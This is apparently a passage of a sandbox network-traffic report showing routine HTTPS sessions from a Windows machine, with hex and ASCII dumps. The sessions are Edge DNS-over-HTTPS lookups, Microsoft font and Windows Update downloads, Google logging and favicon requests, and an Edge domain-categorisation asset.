2024-09-01 04:28:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 c9 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49750	172.64.41.3	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-01 04:28:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-01 04:28:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bc2835508858c3b-EWR alt-svc: h3=":443"; ma=86400
2024-09-01 04:28:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49754	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:20 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-01 04:28:21 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=217039 Date: Sun, 01 Sep 2024 04:28:21 GMT Content-Length: 55 Connection: close X-CID: 2
2024-09-01 04:28:21 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49760	142.250.65.238	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:23 UTC	567	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9
2024-09-01 04:28:23 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Sun, 01 Sep 2024 04:28:23 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49759	142.250.65.238	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:23 UTC	567	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9
2024-09-01 04:28:23 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Sun, 01 Sep 2024 04:28:23 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49761	142.251.40.228	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:23 UTC	887	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.2045.47" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9
2024-09-01 04:28:23 UTC	704	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sun, 01 Sep 2024 04:12:15 GMT Expires: Mon, 09 Sep 2024 04:12:15 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 968 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-01 04:28:23 UTC	686	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-09-01 04:28:23 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a eb Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-09-01 04:28:23 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff fc Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-09-01 04:28:23 UTC	1390	IN	Data Raw: f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-09-01 04:28:23 UTC	574	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49787	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:28:50 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BtOHSlhmZvxL8lL&MD=NHFb+y1s HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-01 04:28:50 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: bc3ddb4e-1f32-42ee-a762-336cf37695c3 MS-RequestId: 40db3415-d986-408c-8a9a-1b10917f6960 MS-CV: 8wca8xktWU2ZwhLw.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 01 Sep 2024 04:28:49 GMT Connection: close Content-Length: 30005
2024-09-01 04:28:50 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-09-01 04:28:50 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49820	23.55.235.170	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:29:17 UTC	442	OUT	OPTIONS /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Origin: https://business.bing.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-01 04:29:17 UTC	359	IN	HTTP/1.1 503 Service Unavailable Content-Length: 27 Content-Type: text/html Date: Sun, 01 Sep 2024 04:29:17 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.65a13617.1725164957.f4fecb3 Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *
2024-09-01 04:29:17 UTC	27	IN	Data Raw: 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The service is unavailable.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49964	13.107.246.40	443	7556	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 04:31:20 UTC	470	OUT	GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: AddressBar Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-01 04:31:20 UTC	553	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:31:20 GMT Content-Type: application/octet-stream Content-Length: 403024 Connection: close Last-Modified: Thu, 19 Oct 2023 17:36:16 GMT ETag: 0x8DBD0C9E5CD1B3B x-ms-request-id: 43adf79c-101e-0051-2509-fc76f2000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240901T043120Z-16579567576rhxz5kgqdm3tfq000000005ug00000000pmgg Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-09-01 04:31:20 UTC	15831	IN	Data Raw: 7b 0d 0a 20 20 20 20 22 30 31 32 33 6d 6f 76 69 65 73 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 39 38 33 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 39 34 38 2c 20 31 31 30 36 2c 20 39 39 37 32 5d 7d 22 2c 0d 0a 20 20 20 20 22 31 30 32 30 33 39 38 2e 61 70 70 2e 6e 65 74 73 75 69 74 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 2c 20 35 39 33 38 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 32 32 38 2c 20 32 33 36 5d 7d 22 2c 0d 0a 20 20 20 20 22 31 33 33 37 78 2e 74 6f 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 39 38 33 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 36 35 37 2c 20 34 37 35 2c 20 34 30 36 38 5d 7d 22 2c 0d 0a 20 20 20 20 Data Ascii: { "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}", "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}", "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",
2024-09-01 04:31:20 UTC	16384	IN	Data Raw: 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 31 30 36 2c 20 35 32 30 33 2c 20 38 34 36 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 70 70 2e 63 68 65 63 6b 65 64 73 61 66 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 2c 20 33 39 37 39 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 31 30 36 2c 20 32 31 38 39 2c 20 38 34 36 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 70 70 2e 63 6c 65 61 72 73 63 6f 72 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 32 31 39 2c 20 38 34 36 39 2c 20 32 37 35 31 2c 20 34 34 35 38 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 70 70 2e 63 6c 69 63 6b 75 70 2e 63 Data Ascii: ier1\": [6061], \"Tier2\": [5106, 5203, 8469]}", "app.checkedsafe.com": "{\"Tier1\": [6061, 8405, 3979], \"Tier2\": [5106, 2189, 8469]}", "app.clearscore.com": "{\"Tier1\": [8405, 6061], \"Tier2\": [6219, 8469, 2751, 4458]}", "app.clickup.c
2024-09-01 04:31:20 UTC	16384	IN	Data Raw: 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 37 39 37 2c 20 38 34 36 39 2c 20 38 31 32 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 77 73 2e 68 61 74 63 68 6c 69 6e 67 73 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 39 31 33 32 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 34 34 34 2c 20 39 32 34 34 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 77 73 30 35 39 2e 68 6f 73 74 63 6f 6d 6d 73 65 72 76 65 72 73 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 36 36 36 2c 20 34 31 35 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 61 77 73 31 34 37 2e 68 6f 73 74 63 6f 6d 6d 73 65 72 76 65 72 73 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b Data Ascii: 61], \"Tier2\": [8797, 8469, 8129]}", "aws.hatchlings.com": "{\"Tier1\": [9132, 6061], \"Tier2\": [5444, 9244]}", "aws059.hostcommservers.co.uk": "{\"Tier1\": [6061], \"Tier2\": [6666, 4159]}", "aws147.hostcommservers.co.uk": "{\"Tier1\": [
2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 22 3a 20 5b 36 32 31 39 2c 20 32 37 35 31 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 61 72 74 2e 65 62 61 79 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 38 31 38 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 33 39 39 2c 20 39 34 39 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 61 72 74 2e 70 61 79 6d 65 6e 74 73 2e 65 62 61 79 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 38 31 38 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 33 39 39 2c 20 39 34 39 37 2c 20 38 33 36 36 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 61 73 65 2e 6f 6d 62 75 64 73 6d 61 6e 2d 73 65 72 76 69 63 65 73 2e 6f 72 67 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 33 39 37 39 2c 20 38 34 30 35 5d 2c 20 5c 22 Data Ascii: ": [6219, 2751]}", "cart.ebay.co.uk": "{\"Tier1\": [7818, 8405], \"Tier2\": [7399, 9497]}", "cart.payments.ebay.co.uk": "{\"Tier1\": [7818, 8405], \"Tier2\": [7399, 9497, 8366]}", "case.ombudsman-services.org": "{\"Tier1\": [3979, 8405], \"
